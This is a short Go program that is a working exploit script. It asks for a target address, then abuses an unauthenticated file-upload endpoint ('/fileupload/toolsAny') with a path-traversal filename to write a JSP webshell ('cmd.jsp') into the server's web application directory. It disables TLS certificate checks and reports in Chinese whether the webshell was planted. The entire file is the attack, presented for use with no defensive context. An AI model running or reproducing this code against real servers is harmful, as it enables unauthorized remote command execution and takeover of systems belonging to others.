package main

import (
	"bytes"
	"crypto/tls"
	"fmt"
	"io"
	"io/ioutil"
	"mime/multipart"
	"net/http"
	"os"
	"strings"
)

func main() {
	var host string
	fmt.Println("请输入目标地址, 如 https://127.0.0.1")
	fmt.Scanf("%s ", &host)
	exp(host)

}

func exp(host string) {
	host = strings.TrimSuffix(host, "/")

	bodyBuf := new(bytes.Buffer)
	bodyWriter := multipart.NewWriter(bodyBuf)
	fileWriter, _ := bodyWriter.CreateFormFile("../../../../repository/deployment/server/webapps/authenticationendpoint/cmd.jsp", "../../../../repository/deployment/server/webapps/authenticationendpoint/cmd.jsp")
	shellfile, _ := os.Open("./shell.jsp")
	defer shellfile.Close()
	_, _ = io.Copy(fileWriter, shellfile)
	contentType := bodyWriter.FormDataContentType()
	bodyWriter.Close()

	tr := &http.Transport{
		TLSClientConfig: &tls.Config{InsecureSkipVerify: true}}

	client := &http.Client{Transport: tr}
	url := host + "/fileupload/toolsAny"
	req, _ := http.NewRequest("POST", url, nil)
	req.Header.Set("User-Agent", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:2.0.1) Gecko/20100101 Firefox/4.0.1")
	req.Header.Set("Content-Type", contentType)
	req.Body = ioutil.NopCloser(bodyBuf)

	resp, _ := client.Do(req)
	data, _ := ioutil.ReadAll(resp.Body)
	defer resp.Body.Close()

	if resp.StatusCode == 200 && string(data) != ""{
		fmt.Printf("webshell写入成功, 地址: %v/authenticationendpoint/cmd.jsp\n", host)
	} else {
		fmt.Println("webshell写入失败")
		fmt.Println(string(data))
	}

}